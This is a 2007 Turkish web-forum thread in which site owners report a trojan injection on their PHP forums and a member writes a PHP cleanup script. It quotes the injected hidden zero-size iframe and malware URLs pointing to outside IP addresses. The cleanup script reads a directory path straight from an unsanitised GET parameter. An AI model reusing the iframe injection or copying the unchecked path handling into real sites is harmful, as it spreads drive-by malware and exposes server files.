Önceki başlık :: Sonraki başlık |
Yazar |
Mesaj |
omerfaruk_02 Mesaj: 100+
Kayıt: Jun 02, 2007 Mesajlar: 149
|
Tarih: 2007-07-25, 15:12:29 Mesaj konusu: Siteme Trojan girmiş ne yapabilirm |
|
|
Arkadaşlar sitemde forum sayfasını açtığım zaman virüs programım (kaspersky) alarm veriyor ve aşağıdakiler çıkıyor.
tespit edildi: Trojan programı Trojan-Spy.Win32.Bancos.aam URL: http://81.95.149.27/oth/get.php?opt=load...
tespit edildi: Trojan programı Trojan-Downloader.JS.Agent.kr URL: http://81.95.149.27/logo/index.php...
Sitemin index dosylarına baktığım zaman en aşağısna yukardakileri koymuşlar ne yapabilirm yardımcı olur musunuz? |
|
Başa dön |
|
|
Bu Site Google Adsense ile Gelir Elde Ediyor
|
Tarih: 2024-11-24, 02:26:55 Mesaj konusu: Forum Arası Reklamlar |
|
|
|
|
Başa dön |
|
|
seyranli Mesaj: 1000+
Kayıt: May 16, 2005 Mesajlar: 3511 Konum: oradan
|
Tarih: 2007-07-25, 15:23:47 Mesaj konusu: |
|
|
hostunda fopen komutu çalışıyodur galiba.
şimdi çıkmam lazım akşam eve gittiğim de bunun içinde bir fonksiyon hazırlayım, sitendeki tüm dosyaları kontrol etsin içinde bu dediğin kodlar geçiyosa temizlesin |
|
Başa dön |
|
|
sima19 Mesaj: 1000+
Kayıt: Oct 07, 2006 Mesajlar: 1856 Konum: Dünya'nın Bi Yerinden
|
Tarih: 2007-07-25, 15:26:15 Mesaj konusu: |
|
|
Bu sorun için 5 tane siteyi komple temizlemek zorunda kaldım.Valla kolayca temizleyn bişey olsa seviriniz.HErkese yavaş yavaş bulaşıyor bu. Bekliyoruz seyranlı kardeş...saolasın |
|
Başa dön |
|
|
seyranli Mesaj: 1000+
Kayıt: May 16, 2005 Mesajlar: 3511 Konum: oradan
|
Tarih: 2007-07-25, 15:31:39 Mesaj konusu: |
|
|
aslında 10-15 satırlık bi sayfayla tüm ftp yi temizlettiririm ama o zman da 30 saniye limitine takılır. neyse halledecem bi şekilde |
|
Başa dön |
|
|
omerfaruk_02 Mesaj: 100+
Kayıt: Jun 02, 2007 Mesajlar: 149
|
Tarih: 2007-07-25, 15:34:05 Mesaj konusu: |
|
|
Bekliyoruz Seyranlı kardeş.Umarım problem çözülür |
|
Başa dön |
|
|
sima19 Mesaj: 1000+
Kayıt: Oct 07, 2006 Mesajlar: 1856 Konum: Dünya'nın Bi Yerinden
|
Tarih: 2007-07-25, 15:39:19 Mesaj konusu: |
|
|
Allah razı olsun kardeşim.Bekliyoruz inş. |
|
Başa dön |
|
|
keops42 Mesaj: 50+
Kayıt: Nov 05, 2005 Mesajlar: 63
|
Tarih: 2007-07-25, 17:03:34 Mesaj konusu: Re: Siteme Trojan girmiş ne yapabilirm |
|
|
vallahi bende bunla ugrasıyorum kac gundur...
forum yonetimine giremiyordum..anti virus alar veriyodu... yanılmıyosam ayni ip den trojen geliyodu...
bi kac yere dosyaları tekrar attım bu seferde site coktu...
benide bilgilendirirseniz sevinirim |
|
Başa dön |
|
|
omerfaruk_02 Mesaj: 100+
Kayıt: Jun 02, 2007 Mesajlar: 149
|
Tarih: 2007-07-25, 22:40:32 Mesaj konusu: |
|
|
Sanırım unuttu bizi Seyranlı kardeş...YARDIM edecek bi arkadaş yok mu... |
|
Başa dön |
|
|
Bu Site Google Adsense ile Gelir Elde Ediyor
|
Tarih: 2024-11-24, 02:26:55 Mesaj konusu: Forum Arası Reklamlar |
|
|
|
|
Başa dön |
|
|
serserialper21 Mesaj: 1000+
Kayıt: Jan 02, 2006 Mesajlar: 1660 Konum: Diyarbakır
|
Tarih: 2007-07-25, 22:52:24 Mesaj konusu: |
|
|
bende de wardı herkes bulasan dosyaların chmod larını 444 yapıp sıyırdı bende ole yaptım sonra da fazla ustunde durmadım nede olsa 444 te girmıyodu |
|
Başa dön |
|
|
seyranli Mesaj: 1000+
Kayıt: May 16, 2005 Mesajlar: 3511 Konum: oradan
|
Tarih: 2007-07-25, 23:41:42 Mesaj konusu: |
|
|
yok yok unutmadım da, bi arkadaşın önemlibi olayı vardı, onu hallettim. şimdi sisin için ne yapabileceğime bi bakayım |
|
Başa dön |
|
|
omerfaruk_02 Mesaj: 100+
Kayıt: Jun 02, 2007 Mesajlar: 149
|
Tarih: 2007-07-26, 00:07:21 Mesaj konusu: |
|
|
Tmm seyranlı kardeş.İstediğin herhangi bir bilgiye ihtiyacın varsa söyle.İndex.html dosyalarının içinde aşağıdaki gibi kod.Başka yerlerde nasıl bilmiyorum
<i f r a m e src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></i f r a m e> |
|
Başa dön |
|
|
omerfaruk_02 Mesaj: 100+
Kayıt: Jun 02, 2007 Mesajlar: 149
|
Tarih: 2007-07-26, 00:43:02 Mesaj konusu: |
|
|
Bakabildiğim kadarıyla sadece foruma bulaşmış.Forum admin paneline tıkladığımda boş bi sayfa geliyor.Forum dosyalarında o koddan başka göremedim.Sanırım bi kaç yerde var.Açılması lazım admin panelinin |
|
Başa dön |
|
|
seyranli Mesaj: 1000+
Kayıt: May 16, 2005 Mesajlar: 3511 Konum: oradan
|
Tarih: 2007-07-26, 00:49:02 Mesaj konusu: |
|
|
tamam şimdi deneme yapalım.
ali online san YARDIM et sende :)
şimdi önce dizindeki tüm dosyaları listeleyeceğim. modules klasörüne atıcaksınız bu sayfayı ve
satfaadi.php?dizin=Your_Account gibi çalıştıracaksınız
$acilacakdizin=$_GET['dizin'];
$klasor=opendir($acilacakdizin);
$dosyalar="";
while ($dosya = readdir($klasor)) {
if ( (!ereg("[.]",$dosya)) ) {
$dosyalar .= $dosya . 'seyranli';
}
}
closedir($klasor);
$dosyalar = explode("seyranli", $dosyalar);
şimdi burada arada . olan yani klasör olmayan dosyaları listeledim.
$oku=array();
for ($i=0;$i<count($dosyalar);$i++) {
$dosyam=$dosyalar[$i];
$hazirla=fopen("/$acilacakdizin/$dosyam", "r");
while (!feof($hazirla)) {
$oku[]=fgets($hazirla);
}
}
şimdi burda da tüm satıları teker teker diziye attım.
ama burda tam olarak nasıl ekliyor onu görmem lazım. eklenmiş bi sayfa varsa onu yollarmısınız |
|
Başa dön |
|
|
omerfaruk_02 Mesaj: 100+
Kayıt: Jun 02, 2007 Mesajlar: 149
|
Tarih: 2007-07-26, 00:54:43 Mesaj konusu: |
|
|
Kusura bakmayasın da seyranlı kardeş php bilgim fazla deil.Biraz daha açıklayıcı olur musun? O kadar uğraşmışsın Allah razı olsun.Php sayfası olarak oluşturup mu atacağım ftpye |
|
Başa dön |
|
|
seyranli Mesaj: 1000+
Kayıt: May 16, 2005 Mesajlar: 3511 Konum: oradan
|
Tarih: 2007-07-26, 01:04:26 Mesaj konusu: |
|
|
ömer şu anda kesin çözüm üretebilmiş değilim. şu anda sadece satır satır okuttum. şimdi mesela sayfanın neresine eklendiğini görmem lazım ki aradan çıkartabilyim o satırları. mesela bir satırmı eklemiş kodu, yoksa bi kaç satıra mı bölmüş. yani o sorunlu dediğin index sayfasının kodlarını görmem lazım |
|
Başa dön |
|
|
seyranli Mesaj: 1000+
Kayıt: May 16, 2005 Mesajlar: 3511 Konum: oradan
|
Tarih: 2007-07-26, 01:41:44 Mesaj konusu: |
|
|
tamam dosyayı arkadaş yolladı. şidmi yuarıdaki kaldığım yerden devam ediyorum.
şimdi her satırı oku dizisine atmıştım ya, her stırda aramayıp, sadece son satırda arama yapıcam.
$satir=count($oku);
dizi de kaç tane satır varmış onları saydırdım, diyelimki 30 sonucunu verdi, son satır $oku[29];
olur, neden çünkü dizinin indisleri 0 dan başlar.
o halde
$satir=count($oku)-1;
yaparsam, son indisi bulurum.
şimdi oku dizi olmaktan çıktı ve sadece değişken oldu. üstelik içinde sadece son satır var. şifdi eregi replace ile de onu değiştirelim.
$degisitirilecekyer="<div alig<i f r a m e src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></i f r a m e>";
$oku[$satir] = ereg_replace($degistirilecekyer, " ", $oku[$satir]);
}
şu ana kadarki yaptığımız yerlerde yaptıklarımızı toplayacak olursak,
verilen klasörün içinde tüm dosyaları belirledik, daha sonra tüm dosyalara sırasıyla şu işlemi yaptık.
1. dosyayı aç
2. her satırı ayrı ayrı kaydet
3. son satırın içinde geçen i f r a m e li yeri sil, yerine boşluk koy.
ama henüz bunları dosyaya yazdırmadık.
o halde bir de onu yapalım. önce diziyi geri birleştirelim.
fclose($hazirla);
$sonhal=implode("\n", $oku);
rename("/$acilacakdizin/$dosyam","/$acilacakdizin/" . $dosyam . ".yedek");
$sondosya = fopen("/$acilacakdizin/$dosyam","w");
fwrite($sondosya,$sonhal);
fclose($sondosya);
dosya bu kadar |
|
Başa dön |
|
|
sima19 Mesaj: 1000+
Kayıt: Oct 07, 2006 Mesajlar: 1856 Konum: Dünya'nın Bi Yerinden
|
Tarih: 2007-07-26, 02:48:22 Mesaj konusu: |
|
|
anladıysam arap olam |
|
Başa dön |
|
|
seyranli Mesaj: 1000+
Kayıt: May 16, 2005 Mesajlar: 3511 Konum: oradan
|
|
Başa dön |
|
|
OEskidendi Mesaj: 1+
Kayıt: Mar 21, 2007 Mesajlar: 38 Konum: 7 Tepe Takım:Galatasaray Meslek:Öğrenci ByOEskidendi
|
Tarih: 2007-07-27, 04:48:02 Mesaj konusu: Re: Siteme Trojan girmiş ne yapabilirm |
|
|
attım işe yaramadı bisi olmadı benim siteyede bulasdı yaw |
|
Başa dön |
|
|
seyranli Mesaj: 1000+
Kayıt: May 16, 2005 Mesajlar: 3511 Konum: oradan
|
Tarih: 2007-07-27, 05:46:00 Mesaj konusu: |
|
|
bi işe yaramadı derken ne yaptı ?
tüm dosyaların içi açıp dosyayı dosya.php.yedek şeklinde yedekleyip yerine yeni dosyayı koyması lazımdı. ve bende son derece güzel çalışıyor. sizde ne yaptı da çalışmadı. |
|
Başa dön |
|
|
Aliosman Teknik Yönetici
Kayıt: Jul 20, 2002 Mesajlar: 3836 Konum: Balıkesir
|
Tarih: 2007-07-27, 10:41:21 Mesaj konusu: |
|
|
Gündüzün yazdığı scripti önce görsel olarak kodlarla inceledim. Bir hata göremedim. Sonra aldım scripti kendi localhostumda denedim. Bir klasörde bulunan tüm dosyalardaki echo ları yok et diye düzelttim. Yedeği oluşturdu ve echo ları yok etti. Değiştirilecek ifadeyi kontrol edin. Sizdeki dosyaların birine bakarak ona göre değişiklik yapın. Yoksa işe yaramayabilir. Bazı virüslerin kodu farklı. |
|
Başa dön |
|
|
omerfaruk_02 Mesaj: 100+
Kayıt: Jun 02, 2007 Mesajlar: 149
|
Tarih: 2007-07-27, 14:45:15 Mesaj konusu: |
|
|
Çıkamayacam işin içinden Allah kahretsin ya boşa gitti bütün emeklerim... |
|
Başa dön |
|
|
OEskidendi Mesaj: 1+
Kayıt: Mar 21, 2007 Mesajlar: 38 Konum: 7 Tepe Takım:Galatasaray Meslek:Öğrenci ByOEskidendi
|
Tarih: 2007-07-27, 17:57:39 Mesaj konusu: |
|
|
Modules/Forums klasörünün içine attım
...modules/Forums/temizle.php olarak sayfaya girdim sayfa beyaz bisi değişmedi
öyle yapılmıcak mı :S |
|
Başa dön |
|
|
gokhan87 Mesaj: 300+
Kayıt: Oct 20, 2006 Mesajlar: 348
|
Tarih: 2007-07-27, 18:12:23 Mesaj konusu: |
|
|
bu lanet trojan'ı nasıl basıyolar sitelere abi ya bilsekte bizde önlemimizi alsak ... |
|
Başa dön |
|
|
ozcancem Mesaj: 1+
Kayıt: Jul 27, 2007 Mesajlar: 5
|
Tarih: 2007-07-27, 20:44:01 Mesaj konusu: Re: Siteme Trojan girmiş ne yapabilirm |
|
|
Bugün tam aynı mesajı ben de yazacaktım bendne önce yazmışlar.Arkadaşlar benim sitedeki forumlara da bu trojan bulaşmış bugün yukarıdakileri uygulasam düzelir mi? |
|
Başa dön |
|
|
|